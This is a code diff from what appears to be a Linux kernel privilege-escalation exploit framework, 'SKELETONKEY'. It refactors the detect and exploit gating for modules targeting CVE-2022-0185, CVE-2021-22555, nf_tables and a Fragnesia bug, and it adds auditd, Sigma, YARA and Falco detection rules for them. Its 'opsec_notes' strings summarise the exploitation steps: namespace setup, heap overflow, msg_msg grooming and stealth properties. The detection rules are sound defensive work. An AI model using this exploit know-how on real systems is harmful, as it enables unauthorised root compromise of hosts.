+# read-only file. These rules flag the syscall surface the exploit
+# drives and writes to the setuid binaries it targets.
+#
+# Install: copy into /etc/audit/rules.d/ and `augenrules --load`, or
+#   skeletonkey --detect-rules --format=auditd | sudo tee \
+#     /etc/audit/rules.d/99-skeletonkey.rules
+
+# Modification of common payload carriers / credential files
+-w /usr/bin/su     -p wa -k skeletonkey-fragnesia
+-w /bin/su         -p wa -k skeletonkey-fragnesia
+-w /usr/bin/mount  -p wa -k skeletonkey-fragnesia
+-w /usr/bin/passwd -p wa -k skeletonkey-fragnesia
+-w /usr/bin/chsh   -p wa -k skeletonkey-fragnesia
+-w /etc/passwd     -p wa -k skeletonkey-fragnesia
+-w /etc/shadow     -p wa -k skeletonkey-fragnesia
+
+# AF_ALG socket creation (family 38) — builds the GCM keystream table
+-a always,exit -F arch=b64 -S socket -F a0=38 -k skeletonkey-fragnesia-afalg
+
+# XFRM state setup over NETLINK_XFRM
+-a always,exit -F arch=b64 -S sendto -k skeletonkey-fragnesia-xfrm
+
+# TCP_ULP espintcp + ESP setsockopt surface
+-a always,exit -F arch=b64 -S setsockopt -k skeletonkey-fragnesia-sockopt
+
+# splice() drives page-cache pages into the ESP-in-TCP stream
+-a always,exit -F arch=b64 -S splice -k skeletonkey-fragnesia-splice
+-a always,exit -F arch=b32 -S splice -k skeletonkey-fragnesia-splice
@@ -0,0 +1,30 @@
+title: Possible Fragnesia exploitation (CVE-2026-46300)
+id: 9b3d2e71-skeletonkey-fragnesia
+status: experimental
+description: |
+  Detects the file-modification footprint of the Fragnesia XFRM
+  ESP-in-TCP page-cache write (CVE-2026-46300): non-root modification
+  of a setuid-root binary or credential file, typically inside a
+  freshly created user + network namespace.
+references:
+  - https://github.com/v12-security/pocs/tree/main/fragnesia
+  - https://lists.openwall.net/netdev/2026/05/13/79
+logsource:
+  product: linux
+  service: auditd
+detection:
+  modification:
+    type: 'PATH'
+    name|startswith:
+      - '/usr/bin/su'
+      - '/bin/su'
+      - '/etc/passwd'
+      - '/etc/shadow'
+  not_root:
+    auid|expression: '!= 0'
+  condition: modification and not_root
+level: high
+tags:
+  - attack.privilege_escalation
+  - attack.t1068
+  - cve.2026.46300
@@ -0,0 +1,12 @@
+/*
+ * fragnesia_cve_2026_46300 — SKELETONKEY module registry hook
+ */
+
+#ifndef FRAGNESIA_SKELETONKEY_MODULES_H
+#define FRAGNESIA_SKELETONKEY_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct skeletonkey_module fragnesia_module;
+
+#endif
@@ -59,15 +59,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
+#include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdint.h>
 #include <sched.h>
 #include <fcntl.h>
 #include <errno.h>
@@ -153,57 +159,53 @@ static const struct kernel_range fuse_legacy_range = {
                      sizeof(fuse_legacy_patched_branches[0]),
 };

-static int can_unshare_userns_mount(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNS) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 /* ------------------------------------------------------------------ */
 /* detect                                                              */
 /* ------------------------------------------------------------------ */
 static skeletonkey_result_t fuse_legacy_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] fuse_legacy: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] fuse_legacy: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.1 (when legacy_parse_param landed). Pre-5.1
     * kernels predate the code path entirely. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 1)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 1, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] fuse_legacy: kernel %s predates the bug introduction\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&fuse_legacy_range, &v);
+    bool patched = kernel_range_is_patched(&fuse_legacy_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] fuse_legacy: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] fuse_legacy: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns_mount();
+    /* user_ns availability comes from the shared host fingerprint. The
+     * fingerprint's probe uses CLONE_NEWUSER alone; this module also
+     * needs CLONE_NEWNS, but the kernel gates both on the same userns
+     * sysctls (kernel.unprivileged_userns_clone / AppArmor restriction),
+     * so the userns probe is a sound proxy. */
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] fuse_legacy: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] fuse_legacy: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] fuse_legacy: user_ns+mount_ns clone (CAP_SYS_ADMIN gate): %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] fuse_legacy: user_ns denied → "
                            "unprivileged exploit unreachable\n");
@@ -378,7 +380,6 @@ struct fuse_arb_ctx {
    bool    trigger_armed;
 };

-#ifdef __linux__
 static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
                          void *ctx_void)
 {
@@ -504,15 +505,6 @@ static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
            (unsigned long)kaddr);
    return 0;
 }
-#else
-static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
-                          void *ctx_void)
-{
-    (void)kaddr; (void)buf; (void)len; (void)ctx_void;
-    fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
-    return -1;
-}
-#endif /* __linux__ */

 /* ------------------------------------------------------------------ */
 /* exploit                                                             */
@@ -526,8 +518,11 @@ static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ct
        return pre;
    }

-    /* (R2) Refuse if already root — no LPE work to do. */
-    if (geteuid() == 0) {
+    /* (R2) Refuse if already root — no LPE work to do. Consult
+     * ctx->host first so unit tests can construct a non-root
+     * fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json) {
            fprintf(stderr, "[i] fuse_legacy: already root; nothing to escalate\n");
        }
@@ -732,7 +727,6 @@ static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ct
     * runs because the arb_write primitive re-fires the trigger and
     * needs the live spray.
     * --------------------------------------------------------------- */
-#ifdef __linux__
    if (ctx->full_chain) {
        if (!ctx->json) {
            fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
@@ -792,7 +786,6 @@ static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ct
        }
        return SKELETONKEY_EXPLOIT_FAIL;
    }
-#endif /* __linux__ */

    /* Clean up our IPC queues and mapping. The kernel slab state
     * after the overflow may be unstable; we exit cleanly on success
@@ -826,6 +819,28 @@ static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ct
    return SKELETONKEY_EXPLOIT_FAIL;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: fsopen/fsconfig + userns+mountns clone are
+ * Linux-only kernel surface. Stub out cleanly so the module still
+ * registers and `--list` / `--detect-rules` work on macOS/BSD dev
+ * boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t fuse_legacy_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] fuse_legacy: Linux-only module "
+                "(fsopen + fsconfig + userns mount) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t fuse_legacy_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] fuse_legacy: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------ */
 /* embedded detection rules                                            */
 /* ------------------------------------------------------------------ */
@@ -856,6 +871,36 @@ static const char fuse_legacy_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1611, cve.2022.0185]\n";

+static const char fuse_legacy_yara[] =
+    "rule fuse_legacy_cve_2022_0185 : cve_2022_0185 kernel_overflow\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-0185\"\n"
+    "        description = \"fs_context legacy_parse_param oversized-source pattern (fsopen cgroup2)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $fsopen  = \"fsopen\" ascii\n"
+    "        $cgrp2   = \"cgroup2\" ascii\n"
+    "    condition:\n"
+    "        all of them\n"
+    "}\n";
+
+static const char fuse_legacy_falco[] =
+    "- rule: fsopen/fsconfig in userns (CVE-2022-0185 trigger)\n"
+    "  desc: |\n"
+    "    Non-root fsopen + fsconfig(FSCONFIG_SET_STRING) sequence\n"
+    "    inside a userns. legacy_parse_param() integer-underflow\n"
+    "    overflow into kmalloc-4k. False positives: containers may\n"
+    "    mount their own filesystems but FSCONFIG with oversized\n"
+    "    'source' option strings is unusual.\n"
+    "  condition: >\n"
+    "    evt.type in (fsopen, fsconfig) and not user.uid = 0\n"
+    "  output: >\n"
+    "    fsopen/fsconfig by non-root\n"
+    "    (user=%user.name pid=%proc.pid evt=%evt.type)\n"
+    "  priority: HIGH\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2022.0185]\n";
+
 const struct skeletonkey_module fuse_legacy_module = {
    .name           = "fuse_legacy",
    .cve            = "CVE-2022-0185",
@@ -868,8 +913,9 @@ const struct skeletonkey_module fuse_legacy_module = {
    .cleanup        = NULL,
    .detect_auditd  = fuse_legacy_auditd,
    .detect_sigma   = fuse_legacy_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = fuse_legacy_yara,
+    .detect_falco   = fuse_legacy_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNS) for CAP_SYS_ADMIN; fsopen('cgroup2') + multiple fsconfig(FSCONFIG_SET_STRING, 'source', ...) calls to overflow legacy_parse_param's buffer. OOB write lands in kmalloc-4k adjacent to a msg_msg groom. No persistent files (msg_msg lives in the IPC namespace which disappears with the child). Dmesg silent on success; KASAN would show slab corruption if enabled. Audit-visible via unshare(CLONE_NEWUSER|CLONE_NEWNS) + fsopen + fsconfig pattern in a single process. No cleanup callback - IPC queues auto-drain on namespace exit.",
 };

 void skeletonkey_register_fuse_legacy(void)
@@ -58,16 +58,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdint.h>
 #include <fcntl.h>
 #include <errno.h>
 #include <sched.h>
@@ -76,8 +81,6 @@
 #include <sys/socket.h>
 #include <sys/types.h>
 #include <sys/stat.h>
-
-#ifdef __linux__
 #include <sys/ipc.h>
 #include <sys/msg.h>
 #include <sys/syscall.h>
@@ -91,31 +94,6 @@
 #ifndef SOL_IP
 #define SOL_IP  0
 #endif
-#endif
-
-/* ---------- macOS / non-linux build stubs ---------------------------
- * SKELETONKEY modules are dev-built on macOS (clangd / syntax check) and
- * run-built on Linux. The Linux-only types and IPT_SO_SET_REPLACE
- * constants are absent on Darwin; stub them so the .c file compiles
- * cleanly under either toolchain. The actual exploit body is gated
- * by `#ifdef __linux__` at runtime entry. */
-#ifndef __linux__
-#define CLONE_NEWUSER       0x10000000
-#define CLONE_NEWNET        0x40000000
-#define IPPROTO_RAW         255
-#define SOL_IP              0
-#define IPT_SO_SET_REPLACE  64
-struct ipt_replace { char dummy; };
-__attribute__((unused)) static int    msgget(int a, int b)             { (void)a;(void)b; errno=ENOSYS; return -1; }
-__attribute__((unused)) static int    msgsnd(int a, const void *b, size_t c, int d) { (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
-__attribute__((unused)) static ssize_t msgrcv(int a, void *b, size_t c, long d, int e) { (void)a;(void)b;(void)c;(void)d;(void)e; errno=ENOSYS; return -1; }
-__attribute__((unused)) static int    msgctl(int a, int b, void *c)    { (void)a;(void)b;(void)c; errno=ENOSYS; return -1; }
-#define IPC_PRIVATE   0
-#define IPC_CREAT     01000
-#define IPC_NOWAIT    04000
-#define IPC_RMID      0
-#define MSG_COPY      040000
-#endif

 /* ---- Kernel range ------------------------------------------------- */

@@ -139,53 +117,44 @@ static const struct kernel_range netfilter_xtcompat_range = {

 /* ---- Detect ------------------------------------------------------- */

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static skeletonkey_result_t netfilter_xtcompat_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] netfilter_xtcompat: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] netfilter_xtcompat: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

-    if (v.major < 2 || (v.major == 2 && v.minor < 6)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 2, 6, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] netfilter_xtcompat: kernel %s predates the bug introduction\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&netfilter_xtcompat_range, &v);
+    bool patched = kernel_range_is_patched(&netfilter_xtcompat_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] netfilter_xtcompat: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] netfilter_xtcompat: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
        fprintf(stderr, "[i] netfilter_xtcompat: kernel %s in vulnerable range "
-                        "(bug existed since 2.6.19, 2006)\n", v.release);
+                        "(bug existed since 2.6.19, 2006)\n", v->release);
        fprintf(stderr, "[i] netfilter_xtcompat: user_ns+net_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] netfilter_xtcompat: user_ns denied → "
                            "unprivileged exploit path unreachable\n");
@@ -202,8 +171,6 @@ static skeletonkey_result_t netfilter_xtcompat_detect(const struct skeletonkey_c

 /* ---- Exploit: userns reach + trigger + groom ---------------------- */

-#ifdef __linux__
-
 /* Write uid_map and gid_map after unshare so we're root in userns.
 * This is the standard setgroups=deny pattern; without it the uid_map
 * write is rejected on modern kernels for unprivileged callers. */
@@ -471,8 +438,6 @@ static int xtcompat_fire_trigger(int *out_errno)
    return 0;
 }

-#endif /* __linux__ — close original primitive block */
-
 /* ---- Full-chain arb-write primitive --------------------------------
 *
 * Pattern (FALLBACK — see module top-comment): the xt_compat 4-byte OOB
@@ -509,8 +474,6 @@ static int xtcompat_fire_trigger(int *out_errno)
 * patched kernel the trigger returns EINVAL on step 2 and arb_write
 * returns -1 without ever queueing the follow-up. */

-#ifdef __linux__
-
 struct xtcompat_arb_ctx {
    /* Spray queues kept hot across multiple arb_write calls. The
     * msg_msg slots seeded here are what the finisher uses as
@@ -636,15 +599,16 @@ static int xtcompat_arb_write(uintptr_t kaddr,
    return 0;
 }

-#endif /* __linux__ */
-
 /* ---- Exploit driver ---------------------------------------------- */

 static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_ctx *ctx)
 {
    /* 1. Refuse-gate: re-confirm vulnerability through detect(). */
    skeletonkey_result_t pre = netfilter_xtcompat_detect(ctx);
-    if (pre == SKELETONKEY_OK && geteuid() == 0) {
+    /* Consult ctx->host first so unit tests can construct a non-root
+     * fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (pre == SKELETONKEY_OK && is_root) {
        fprintf(stderr, "[i] netfilter_xtcompat: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -652,7 +616,7 @@ static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_
        fprintf(stderr, "[-] netfilter_xtcompat: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    if (is_root) {
        fprintf(stderr, "[i] netfilter_xtcompat: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -661,11 +625,6 @@ static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_
        return SKELETONKEY_PRECOND_FAIL;
    }

-#ifndef __linux__
-    fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
-    (void)ctx;
-    return SKELETONKEY_PRECOND_FAIL;
-#else
    /* Full-chain pre-check: resolve offsets before forking. If
     * modprobe_path can't be resolved, refuse early with the manual-
     * workflow help — no point doing the userns + spray + trigger
@@ -944,7 +903,6 @@ static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_
        fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
        return SKELETONKEY_EXPLOIT_FAIL;
    }
-#endif /* __linux__ */
 }

 /* ---- Cleanup ----------------------------------------------------- */
@@ -963,6 +921,33 @@ static skeletonkey_result_t netfilter_xtcompat_cleanup(const struct skeletonkey_
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: setsockopt(IPT_SO_SET_REPLACE) + nfnetlink +
+ * userns is Linux-only kernel surface. Stub out cleanly so the module
+ * still registers and `--list` / `--detect-rules` work on macOS/BSD
+ * dev boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t netfilter_xtcompat_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] netfilter_xtcompat: Linux-only module "
+                "(xt_compat_target_to_user via SET_REPLACE) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] netfilter_xtcompat: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t netfilter_xtcompat_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* ---- Detection rules --------------------------------------------- */

 static const char netfilter_xtcompat_auditd[] =
@@ -975,6 +960,55 @@ static const char netfilter_xtcompat_auditd[] =
    "-a always,exit -F arch=b64 -S msgsnd -k skeletonkey-xtcompat-msgmsg\n"
    "-a always,exit -F arch=b64 -S msgrcv -k skeletonkey-xtcompat-msgmsg\n";

+static const char netfilter_xtcompat_sigma[] =
+    "title: Possible CVE-2021-22555 xt_compat OOB write\n"
+    "id: e67f90d5-skeletonkey-xtcompat\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects setsockopt(SOL_IP, IPT_SO_SET_REPLACE) from a non-root\n"
+    "  process inside unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by\n"
+    "  msg_msg grooming (msgsnd/msgrcv) and sendmmsg sk_buff spray.\n"
+    "  False positives: iptables config inside rootless containers /\n"
+    "  network namespaces. Correlate with privilege escalation\n"
+    "  (setresuid 0,0,0) to confirm.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:   {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  sso:      {type: 'SYSCALL', syscall: 'setsockopt', a1: 0}\n"
+    "  groom:    {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: userns and sso and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2021.22555]\n";
+
+static const char netfilter_xtcompat_yara[] =
+    "rule netfilter_xtcompat_cve_2021_22555 : cve_2021_22555 kernel_oob_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2021-22555\"\n"
+    "        description = \"xt_compat 4-byte OOB write log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $log = \"/tmp/skeletonkey-xtcompat.log\" ascii\n"
+    "    condition:\n"
+    "        $log\n"
+    "}\n";
+
+static const char netfilter_xtcompat_falco[] =
+    "- rule: setsockopt IPT_SO_SET_REPLACE by non-root in userns\n"
+    "  desc: |\n"
+    "    Non-root process calls setsockopt(SOL_IP, IPT_SO_SET_REPLACE)\n"
+    "    from inside a userns with CAP_NET_ADMIN. The xt_compat\n"
+    "    target_to_user() handler writes past the xt_table_info\n"
+    "    allocation; CVE-2021-22555. False positives: iptables\n"
+    "    config in rootless containers.\n"
+    "  condition: >\n"
+    "    evt.type = setsockopt and not user.uid = 0\n"
+    "  output: >\n"
+    "    setsockopt SOL_IP by non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2021.22555]\n";
+
 const struct skeletonkey_module netfilter_xtcompat_module = {
    .name           = "netfilter_xtcompat",
    .cve            = "CVE-2021-22555",
@@ -986,9 +1020,10 @@ const struct skeletonkey_module netfilter_xtcompat_module = {
    .mitigate       = NULL,    /* mitigation: upgrade kernel; disable unprivileged_userns_clone */
    .cleanup        = netfilter_xtcompat_cleanup,
    .detect_auditd  = netfilter_xtcompat_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = netfilter_xtcompat_sigma,
+    .detect_yara    = netfilter_xtcompat_yara,
+    .detect_falco   = netfilter_xtcompat_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + setsockopt(SOL_IP, IPT_SO_SET_REPLACE) with a malformed xt_entry_target to trigger xt_compat_target_to_user 4-byte OOB into kmalloc-2k. msg_msg + sk_buff cross-cache groom. Writes /tmp/skeletonkey-xtcompat.log (breadcrumb). Audit-visible via unshare + setsockopt(IPT_SO_SET_REPLACE) + msgsnd/msgrcv + sendmmsg(sk_buff spray). Dmesg silent on success; KASAN oops if the groom misses. Cleanup callback unlinks the log; IPC auto-drains on namespace exit.",
 };

 void skeletonkey_register_netfilter_xtcompat(void)
@@ -57,16 +57,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdint.h>
 #include <sched.h>
 #include <fcntl.h>
 #include <errno.h>
@@ -83,6 +88,7 @@
 #include <linux/netfilter.h>
 #include <linux/netfilter/nfnetlink.h>
 #include <linux/netfilter/nf_tables.h>
+#include "../../core/nft_compat.h"  /* shims for newer-kernel uapi constants */

 /* ------------------------------------------------------------------
 * Kernel-range table
@@ -90,7 +96,7 @@

 static const struct kernel_patched_from nf_tables_patched_branches[] = {
    {5,  4, 269},   /* 5.4.x */
-    {5, 10, 210},   /* 5.10.x */
+    {5, 10, 209},   /* 5.10.x (harmonised with Debian bullseye fix-version) */
    {5, 15, 149},   /* 5.15.x */
    {6,  1,  74},   /* 6.1.x */
    {6,  6,  13},   /* 6.6.x */
@@ -108,19 +114,6 @@ static const struct kernel_range nf_tables_range = {
 * Preconditions probe
 * ------------------------------------------------------------------ */

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static bool nf_tables_loaded(void)
 {
    FILE *f = fopen("/proc/modules", "r");
@@ -136,44 +129,47 @@ static bool nf_tables_loaded(void)

 static skeletonkey_result_t nf_tables_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] nf_tables: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] nf_tables: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.14. Anything below predates it. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 14)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 14, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] nf_tables: kernel %s predates the bug "
-                            "(introduced in 5.14)\n", v.release);
+                            "(introduced in 5.14)\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&nf_tables_range, &v);
+    bool patched = kernel_range_is_patched(&nf_tables_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] nf_tables: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] nf_tables: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    bool nft_loaded = nf_tables_loaded();

    if (!ctx->json) {
        fprintf(stderr, "[i] nf_tables: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] nf_tables: unprivileged user_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" :
-                                 "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
        fprintf(stderr, "[i] nf_tables: nf_tables module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (will autoload on first nft use)");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] nf_tables: kernel vulnerable but user_ns clone "
                            "denied → unprivileged exploit unreachable\n");
@@ -618,7 +614,6 @@ static long slabinfo_active(const char *slab)
 * Factored out so --full-chain can re-fire the trigger between
 * msg_msg sprays without duplicating the batch-building logic.
 * ------------------------------------------------------------------ */
-#ifdef __linux__
 static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
 {
    (void)cap;
@@ -792,7 +787,6 @@ static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vct
    usleep(20 * 1000);
    return 0;
 }
-#endif /* __linux__ */

 /* ------------------------------------------------------------------
 * The exploit body.
@@ -807,8 +801,11 @@ static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
        return pre;
    }

-    /* Gate 2: already root? Nothing to escalate. */
-    if (geteuid() == 0) {
+    /* Gate 2: already root? Nothing to escalate. Consult ctx->host first
+     * so unit tests can construct a non-root fingerprint regardless of
+     * the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json)
            fprintf(stderr, "[i] nf_tables: already running as root\n");
        return SKELETONKEY_OK;
@@ -825,7 +822,6 @@ static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
        }
    }

-#ifdef __linux__
    /* --- --full-chain path --------------------------------------- *
     * Resolve offsets BEFORE doing anything destructive so we can
     * refuse cleanly on hosts where we have no modprobe_path. We run
@@ -906,7 +902,6 @@ static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
